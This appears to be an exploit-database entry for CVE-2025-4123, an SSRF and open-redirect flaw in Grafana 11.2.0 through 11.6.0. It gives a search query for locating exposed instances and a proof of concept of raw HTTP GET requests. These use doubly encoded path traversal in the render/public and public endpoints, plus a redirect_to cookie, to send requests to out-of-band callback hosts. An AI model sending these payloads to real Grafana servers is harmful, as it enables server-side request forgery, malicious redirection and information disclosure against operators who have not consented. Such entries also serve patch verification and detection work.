# Exploit Title: Grafana 11.6.0 - SSRF # FOFA: app="Grafana" # Date: 2-11-2025 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://grafana.com/ # Software Link: https://grafana.com/grafana/download # Version: 11.2.0 - 11.6.0 # CVE: CVE-2025-4123 Description: An SSRF (Server-Side Request Forgery) vulnerability exists in Grafana's `render/public` (and related public rendering) endpoints owing to a combination of client-side path traversal encoding and an open redirect. Under certain configurations — especially when anonymous access or vulnerable plugins (e.g., Image Renderer) are enabled — an attacker can cause the server to perform requests to attacker-controlled hosts or induce redirections that lead to SSRF and subsequent information disclosure. POC: GET /render/public/..%252f%255Cczeqm5.dnslog.cn%252f%253F%252f..%252f.. HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0 Connection: close Accept-Encoding: gzip GET /public/..%2F%5c123.czeqm5.dnslog.cn%2F%3f%2F..%2F.. HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19 Connection: close Cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cd0nt31pu8bl7cn5ncca08sg68smps8h39.oast.live%25252f%25253F%25252f..%25252f.. Accept-Encoding: gzip